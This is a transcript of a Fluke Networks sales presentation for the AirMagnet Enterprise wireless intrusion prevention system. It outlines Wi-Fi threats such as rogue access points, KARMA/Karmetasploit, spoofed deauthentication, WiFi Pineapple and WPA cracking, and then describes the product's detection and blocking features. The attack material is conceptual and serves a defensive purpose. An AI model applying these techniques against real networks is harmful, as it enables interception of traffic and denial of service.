are you ready for wifi explosion? reiner hofmann emea director carrier wireless business
TRANSCRIPT
ARE YOU READY FOR WIFI EXPLOSION?
Reiner HofmannEMEA Director Carrier Wireless Business
2
Fluke Networks is the world-leading provider of network test and monitoring solutions to speed the deployment and improve the performance of networks and applications. Leading enterprises and service providers trust Fluke Networks’ products and expertise to help solve today’s toughest issues and emerging challenges in data centers, mobility, unified communications and WLAN security.
Company Profile:• $350+ million company; distributes products in more than
50 countries• Over 800 employees worldwide with major facilities in:
Everett, WA; Colorado Springs, CO; Santa Clara, CA; Duluth, GA; Rockville, MD; Beijing, China; Eindhoven, Netherlands
AirMagnet Enterprise provides:
• Additional layer of defense with focus on OSI layer 1 & 2• Dynamic threat update• Active Blocking • Forensic capture• Threat correlation• Smart device detection & classification• 3rd party integration (SIM/NMS)• Real time pro-active root cause anaylsis & troubleshooting • Active Testing (automatic health check)• Purpose build True Spectrum Analysis and classification of 2G/3G/4G
(GSM/UMTS/LTE/PCS/AWS/SMR900/CDMA, Tetra (800 MHz), 900 Mhz ISM) 698 MHz & 2690 MHz
EXECUTIVE SUMMARY
Fluke Networks AirMagnet Enterprise (AME) is NOT competing against AP-Infrastructure vendors. It is complementary and independant to any particular WLAN system.
–4
Planning
Deployment & Verification
Troubleshooting& Interference
24x7 Performance& Security
Wired/WLAN Analysis WLAN Test & Analysis
OneTouch™ AT Network Assistant
OptiView® XGNetwork Analysis
Tablet
Spectrum Analysis
AirMagnetSpectrum XT
AirCheck ™ Wi-Fi Tester
AirMagnetVoFi Analyzer
AirMagnetWiFi
Analyzer
SOLUTIONS FOR THE ENTIRE WIRELESS LIFECYCLE
AirMagnetEnterprise
AirMagnetPlanner
AirMagnetSurvey
AirMapperTM
AirMagnetSpectrum ES
MOBILE DEVICES ARE EXPLODING
• 96% of mobile employees carry >2 devices; almost 50 percent carry more than 3
• iPads and eReaders entering the enterprise• Most smart phones now mixed-use
From: Lisa Phifer / Core Competence, Interop/Sep-2010
THE WIRELESS JUNGLE GETS WILDER…
THE WIRELESS LANDSCAPE IS EVOLVING!!!
Traffic & Revenue is shifting indoors
Huge Mobile
Data Explosion
The race to LTE
Increase in
spectrum deficits
THE SECURITY WORLD IS GETTING MORE CHALLENGING
Threats are
increasing
The number of assets that
need protection
are growing
Sources of threats are
evolving
Security solutions
need to be more
discrete
WIRELESS SECURITY TRENDS FOR 2013
• Protecting and securing the air will become more important Protecting the device and AP is not sufficient
• Mobile devices as the new target- With the explosion of BYOD in the marketplace, employees are bringing their
mobile devices into work. With company data on these mobile devices, hackers have a much larger target.
• Cellular impersonation and Jamming/DoS attacks - Small cells are gaining traction and can offer a way into the corporate network
• Mobile devices as the attackers- Lately there has been a proliferation of wireless hacking tools for the Android
platform. Gone are the days when you needed a laptop to perform the attacks. Hackers can now do this from their pockets.
IT WILL BE MORE AND MORE CHALLENGING
WIRELESS SECURITY TRENDS FOR 2013
• Impersonation attacks are always on the rise - Whether its impersonating a valid client or impersonating a corporate Access Point the threat
is always loss of sensitive company data
• WPA-PSK brute force attacks will increase- Just because you are using WPA-PSK doesn’t mean you are safe. You need have a policy for
using complex Pre Shared Keys. There are plenty of Online Services that a small fee will crack your network handshake in minutes.
• Malware will increase- With increasing proliferation of mobile devices, mobile adware will increase.
IT WILL BE MORE AND MORE CHALLENGING
WHAT ARE THE CHALLENGES?
Need to detect unauthorized RF
Jammers
Detect unauthorized cell
phones and traffic
Need for Affordable tools
Need to ensure “no-wireless
zones”Need for easy to use solution
Need for a discrete security
solution
Need for a discrete security
solution
Need to detect unauthorized
cellphones and traffic
Top Needs
Capture & retain forensic evidence
Mobil Client is weak point
Need to secure Layer 1&2
Authentication & Encryption is not
sufficient
–11
Some security basics
OSI MODELL
Application
Network
Transport
Session
Presentation
Physical
Data Link
Logical Link ControlLLC
Media Access ControlMAC
Physical
OSI IEEE 802
Wire
less
LAN
Perim
eter
/App
licati
on
Secu
rity
Traditional IPS / FW does NOT cover layer1/2
Encryption is just „DATA-Frame“ Whole connection MUST be
transparent
WIRELESS IS JUST LAYER 1 & 2
–13
THE ROGUE ACCESS POINT
• Malicious or accidental• Opens paths around wired
security measures• Allows external
access to the wired network
• Rogues are the most well-knownvulnerability
• Symptomatic ofthe greater security challenge of wireless
FirewallNAT IDSRogue AP
PHYSICAL DEPLOYMENT OF AN UNAUTHORIZED AP INSIDE THE NETWORK
–14
INTERNAL TRAFFIC
• Outsiders can see anything in the clear (email, web, etc)
• Users and devices can be seen and targeted directly (circumvents NAT)
• Clients can connect directly via Ad-hoc
• Every device and all traffic must be secured
• Creates massivenew managementchallenges toensure encryptionand configurationfor all devices
FirewallNAT IDS
Hacker listening to the airwaves
Capture and break weak keys Capture traffic in the clear
Approved AP
Ad-hoc Clients
ALL INTERNAL CLIENT TRAFFIC CAN BE DIRECTLY MONITORED FROM THE OUTSIDE
–15
OUTBOUND CONNECTIONS
• Clients can make connections without ever touching the corporate infrastructure
• Accidental associationsare very common
• Many wirelesshacks targetclients in orderto retrievelogin information
FirewallNAT IDS
Hacker listening to the airwaves
Neighbor hotspot
Hacker captures traffic in the clear
LOSS OF VISIBILITY INTO OUTBOUND CONNECTIONS
–16
KARMA
• Beacons back to all those networks as well as common default networks (FreeWiFi, Vendor Defaults, etc)
• Clients will respondto beacons it recognizes, evenif the client did notprobe for that network “Network B, are
you there?”
“I am Network A”“I am Network B”“I am FreeWiFi”
“Network A, are you there?”
LEARNS ALL NETWORKS THAT ALL CLIENTS ARE PROBING FOR IN THE AREA
–17
main differences:• Karmetasploit does not have the limitation of only working on hardware configured with the
patched Mad-wifi drivers• includes a DNS daemon that responds to all requests, a POP3 service, an IMAP4 service, a
SMTP service, a FTP service, a couple of different SMB services, and most importantly, a web service.
• comes with the powerful exploit framework that is metasploit.
KARMASPLOIT
EVEN MORE SOPHISITICATED
–18
TELLS YOU EVERYTHING
IEEE 802.11 Type/Subtype: Data (32) Frame Control: 0x4108 (Normal) Version: 0 Type: Data frame (2) Subtype: 0 Flags: 0x41 DS status: Frame is entering DS (To DS: 1 From DS: 0) (0x01) .... .0.. = More Fragments: This is the last fragment .... 0... = Retry: Frame is not being retransmitted ...0 .... = PWR MGT: STA will stay up ..0. .... = More Data: No data buffered .1.. .... = WEP flag: WEP is enabled 0... .... = Order flag: Not strictly ordered Duration: 25818 BSS Id: 00:02:2d:1b:3e:58 (Agere_1b:3e:58) Source address: 00:02:2d:40:64:86 (Agere_40:64:86) Destination address: 00:06:25:ff:95:8e (LinksysG_ff:95:8e) Fragment number: 0 Sequence number: 67 WEP parameters Initialization Vector: 0x0b0931 Key: 0 WEP ICV: 0x975415b1 (not verified)Data (72 bytes)
0000 08 41 02 01 00 02 2d 1b 3e 58 00 02 2d 40 64 86 .A....-.>[email protected] 00 06 25 ff 95 8e 30 04 0b 09 31 00 a3 a4 fd 36 ..%...0...1....60020 67 fb bd aa 88 cf bf de 92 ec d7 3a 3f 74 26 83 g..........:?t&.0030 bc cf 65 40 2d e7 41 f1 77 b6 7d a7 0f 7e 01 1e [email protected].}..~..0040 d9 ef f6 92 11 28 f4 57 d6 ee 8f 99 5e bf a2 ab .....(.W....^...0050 e4 e1 86 84 41 5f 69 0b 0f 9f 4e e4 81 b4 2a 3e ....A_i...N...*>0060 26 36 ac 02 97 54 15 b1 &6...T..
BEACON AND PROBE FRAME
Which OS? Is it a threat available?
Can I use default key even strong encryption …
–19
WIRELESS CLIENT ATTACKS
Denial of Service – RF or MAC based • Easy to spoof disassociation and deauthentication frames• Easy to inject broadcast and multicast traffic
DoS a Station with WLAN-JackTarget (User) AP
Attacker
1
2
ORIGINAL MAC: 00 12 2D 50 43 1E
NEW MAC: 00 02 2D 50 D1 4E
MAC: 00 02 2D 50 D1 4E
3
3. Send Disassoc & Deauth frames
2. Impersonate AP
1. User enjoying good connection
Exploiting driver vulnerabilities to run remote code, inject malware, etc.
IEEE 802.11 MANAGEMENT FRAMES ARE NOT AUTHENTICATED
–2020
WiFi Pineapple
–21
WPA CRACKING
–22
ENTERPRISE WLAN SECURITY THREAT TRENDS
• Easier to use• Easier to get
22
ATTACK ARE MORE SOPHISTICATED
–23
Security values
WIRED NETWORKS ARE DESIGNED FOR A LINEAR ASSAULT
FOCUS OF THE NETWORK IS SHIFTING TO THE EDGE
• Traditional networks delivered security and control through centralization
• Heavily secured entry and exit points• Multiple layers of security• Frequent Zero-day threat update are routine• Security Policy enforcement with active blocking• Threat correlation and mitigation • Internal devices benefit from umbrella coverage
THE NEED FOR NEW TYPES OF OVERSIGHT
• Mobility breaks the centralized model by opening the door to outbound connections
• Now internal-only traffic is also exposed• “Network traffic has moved to the suburbs”• All traffic in shared medium• Direct access to outside world• Internal traffic exposed
LOSS OF SECURITY
Intranet
WLC
AP build in Sec Rudimental Line of Defense
Lay
er 4
-7 F
irew
all
Lay
er 4
-7 F
irew
all
Layer 2 traffic
Layer 2 traffic
Layer 2 traffic
WIRELESS AP WITH RUDIMENTAL BUILD-IN SEC FEATURES
• Just one layer of security on the wireless side (layer2)
• No threat /signature update• No Security Policy enforcement with active
blocking• No Threat correlation and mitigation• If DDos or Layer 1 jamming attack, AP
solutiuon will immediatly die
Static security cannot keep pace with new devices, new technologies, new protocols, new threats...
If not in full monitor mode – AP‘s • are busy with more and services • can only do Part-time scanning • need to decide between scanning and
signal provisioning
AME ADDS ANOTHER LINE OF DEFENSE
Intranet
AP build in Sec Rudimental Line of Defense
Lay
er 4
-7 F
irew
all
Lay
er 4
-7 F
irew
all
Layer 2 traffic
Layer 2 traffic
Layer 2 traffic
1st Line of Defense Layer 2- WIPS
AME Sensor
• Real time monitoring
• Zero-Day Thread protection
• Blocking• Policy
enforcement• Attack IDS• Forensic
DTU
Server downloads new signature module
Flukenetworks.com
WIRELESS AP WITH RUDIMENTAL BUILD-IN SEC FEATURES +AME
+ Heavily secured entry and exit points+ Multiple layers of security+ Frequent Zero-day threat update+ Security Policy enforcement with active
blocking+ Threat correlation and mitigation + Real time monitoring+ NMS, SIEM integration+ Forensic analysis (file capturing)+ Full Rogue RF + wire trace and blocking+ Security system resilience+ …+ Internal devices benefit from umbrella
coverage
AírMagnet Enterprise is closing the major GAP‘s- 1st line of defense- Frequent Threat update- Active blocking
Principle Architecture
28
Servers• Runs on virtual or
dedicated Windows Server environments
• Hot standby server can be in separate datacenter
• Supports up to 1000 sensors per server
Sensors• Sensors can be located
anywhere in global network, uses secure SSL-based link
• Hardware and Software Sensor Agents can be combined for optimal monitoring
AIRMAGNET ENTERPRISE SYSTEM ARCHITECTURE
FLEXIBLE AND SCALABLE
29Company Confidential
• Distinctive look• Blends visually into ceiling
mount- unobtrusive in sensitive aesthetic environments like VIP areas or hospitals
• Internal and external antenna options
WHAT IS SENSORS MECHANICAL DESIGN?
29
–30
“AIRWISE” IS THE HEART OF AME
The most comprehensive list of wIPS signatures in the industry AirWISE Encyclopedia. Every signature contains a detailed description about the attack and
how to remediate the threat. Set threshold levels to trigger different notifications Airwise automatically checks for hundreds of potential problems around the clock
Get Notified
Trigger alerts via email, SNMP, instant message, page to specific targets
Escalate
Set multiple thresholds and responses for each policy
“ …Just send a note when channel util hits 30%, but start paging staff when it his 40%”
PROVIDES PROACTIVE ALERTING
–31
QUICKLY UPDATE TO PROTECT AGAINST A NEW THREAT
Analyze & assess severity - Post response
Create and release new
alarm
Publish DTU file
VulnerabilityPublished
1 day – 2 weeks 1 day – 2 weeks
`̀ `̀
Automated DTU download &
alarm is active
Instant
End-user Timeline
Every hour
• AirMagnet Wireless Intrusion Research team can rapidly customize or create new signatures / rules for newly discovered vulnerabilities
• Users have immediate protection from new threats• No disruption of WIPS protection or wireless service to update signature module• Automated updates require no IT staff cycles• Users , AirWise Community contribute to creation of new signatures
0 days1 day to 2 weeks
DYNAMIC THREAT UPDATE - DTU
New threat signatures are automatically delivered to sensors across the organization for instant protection with no down time and no IT staff
–32
DTU – JUST ONE EXAMPLE
AUTOMATED PROTECTION
– 33
Port look-up and suppression On-command shutdown
Wired-side Port Shutdown
Terminates target device only – minimal disruption to rest of network
Automated or on-command disconnect Authorization required, audit trail
maintained Compliant with applicable laws & FCC
regulations
Wireless Termination
AirMagnet Sensor
AirMagnet Server
Switch
Laptop
Neighboring AP
ALERT!
Accidental Association
TERMINATED!
Accidental Association
ALERT!
Rogue AP on Network
PORT SUPPRESSED!
Rogue AP on Network
X
EXAMPLE – HOW DOES AME WORK?
COUNTERMEASURES
Specific Event Alarm Triggers when Rogue AP is found INSIDE Premise Boundary
AUTOMATED PERIMETER DETECTION
COUNTERMEASURES
Wireless tracing The sensor when it detects an open Rogue or Unknown AP, will attempt to connect to it. Once connected, it will forward itself a frame to determine if its on the wire.
Wired listener
The sensor puts its wired interface into promiscuous mode and listens for broadcast frames trying to match against the Rogue and Unknown AP's that are seen. +2/-2 of the wireless MAC address
DHCP fingerprinting
Sensor on the wired interface is listening for DHCP request packets to determine if the Unknown or Rogue device is on the wire.
eROW
ARP sweep the subnet, compare the list of MAC addresses with the Unknown or Rogue list, +2/-2 of the wireless MAC address.
Switch tracing Using SNMP, crawl switches looking for wireless MAC address from Rogue and Unknown AP's. +2/-2 of the wireless MAC address, if cant find via this method, we can also trace based on connected stations MAC address.
5 DIFFERENT METHODS FOR TRACING ROGUE ACCESS POINTS
35
DETECT ROGUES
–36
COMPLETE SECURITY VISIBILITY
SCANNING ON ALL 200 EXTENDED CHANNELS FOR 5 GHZ
–37
• The Challenge– Security and performance event triggers
often require post inspection to determine remediation
• Solution with Forensics– Automatically capture Wi-Fi and
Spectrum forensic data in the background
– Review packet level capture at exact moment of trigger for deep forensic of threat source
BETTER THAN BEING THERE
37
FORENSIC CAPTURE
3G/4G/LTE spectrum analysis
KEY FEATURES & BENEFITS
• Detect unauthorized cell phone traffic
• Ensure “no-wireless” zones
• Enables users with zero-day Interference Intelligence to detect/identify, classify & locate security threats due to RF interference sources
• Instant detection of cellular data/voice events
• Capture & save, maintain forensic evidence
• Monitor public safety DAS networks
ALL UNIQUE
INTERFERENCE INTELLIGENCE:
• Detect unauthorized interference sources that pose a high security risk for the authorized defense/federal networks- 3 Prong response: Detect, Classify & Locate- Built-in classification of RF Jammers, CW devices
that could render networks unusable- Classify any interference source with custom
signature capability- Built-in locator tool to pin-point location
• Detect unauthorized cell phones or cell
phone data/voice traffic
• Ensure “no-wireless zones”- Data/Voice Events
Visualize data/voice sessions in the selected band
Get details on technology, carrier, power levels, first/last seen time for every event
- Visualize cellular band activity to verify no-wireless violations
Built-in classification database
Data/voice events
Automated classification
COMPLETION LAYER1 VIEW
FORENSIC EVIDENCE
Recording
Capture entire spectrum sessions for replay and analysis
Retain as hard evidence for post-capture forensic investigation and analysis
Record capture sessions
INFORMATION GATHERING
Root cause analysis and troubleshooting
–43
REAL-TIME REMOTE WI-FI ANALYSIS
AME Servers in Data Center
Console running in NOC / SOC or remotely
PRIMARYHOT STANDBY
Direct connect to Sensor for Live
Remote Analysis- Essential for
Problem Investigation
Remote Site
Local Site
Investigate WLAN behavior in Real-time
43
DIRECT CONNECT IN REAL-TIME
–4444
• for analysis and classification• Remote Spectrum interface for live troubleshooting• Covers 2.4GHz, 5GHz and 4.9GHz• 19 classification alarms
REAL-TIME REMOTE TRUE SPECTRUM ANALYSIS
FULL DEDICATED SPECTRUM RADIO
–45
FULL PERFORMANCE ANALYSIS
• Overloaded Channels and Devices– Bandwidth – Association capacity
• Configuration Problems– Missing performance options– Not supporting higher speeds
• Co-existence problems– 11n and a/b/g– b/g protection mechanisms– QoS
• Traffic Problems– Fragmentation– Retries
• RF and Interference
PROVIDES ROOT CAUSE AND DESCRIBES ALL DETAILS
VIEWING THE SMART DEVICES
BYOD CLASSIFICATION
Wireless Assurance
• Perform pre-defined tasks• Collect metrics• Automate• Find out and react to the wireless problem before your users start calling• Generate alarms when thresholds aren’t met• Know exactly what the problem is before your users complain• Get detailed statistics for every step of the test
AUTOMATIC HEALTH CHECK BENEFITS
IDEA – SIMULATE A WIRELESS CLIENT
–49
AUTOMATED HEALTH CHECK
Trending Data for the following• Connection Time• Authentication Time• DHCP Time• Ping Time• FTP Speed• HTTPS Download speed• HTTP Download speed
TRENDING CHARTS
–50
AUTOMATED HEALTH CHECK
• Export your AHC trending data to excel• Exports Daily, Weekly and Monthly data• Automatically creates the excel charts• Exports the Raw data
EXPORT TO EXCEL
Reporting
MULTIPLE REPORTS
52
REPORTING
53
EVERYTHING IS AUTOMATED
REPORTING
SMART DEVICE LIST
3rd Party Integration
56
3RD PARTY INTEGRATION
SNMP out (v1, v2 and v3) to popular NMS platforms.
RDEP support for Cisco tools Integration with SIM products (Arcsight, etc.)
Enterprises want wireless alerts integrated into existing NOC / SOC processes and tools
MULTIPLE MECHANISMS TO PASS EVENT DATA TO EXISTING MONITORING PLATFORMS
Issues if missing: No way to support existing NM operating procedures
AME Servers in Data Center
PRIMARY HOT STANDBY
SNMPSyslogEmail
Custom
• Real-time 24X7 pro-active troubleshooting AND security monitoring solution
• complementary to AP vendor solutions
• Strong capability to secure mobil clients as well
• Closes all GAP’s (security & troubleshooting)
• smart device (mobile device) management with BYOD classification
• AHC – active testing
• Real end-user experience analysis
• Root cause analysis and troubleshooting with build-in AirWise intelligence
COMPLEMENTARY VALUE OF AME
SUMMARY
–58
Planning
Deployment & Verification
Troubleshooting& Interference
24x7 Performance& Security
FLUKE NETWORKS
WLAN Infrastructure vendors
WLAN Infrastructure vendors
ONE-STOP SHOP FOR ALL NEEDS AND PAINS
Reiner Hofmann
EMEA Director Wireless/Airmagnet BUFluke NetworksOffice: +49 7152 929 622Mobil: +49 1520 [email protected]
THANK YOU
Your Fluke Networks partner in Belgium (Benelux-region):
[email protected] for demo’s & more info.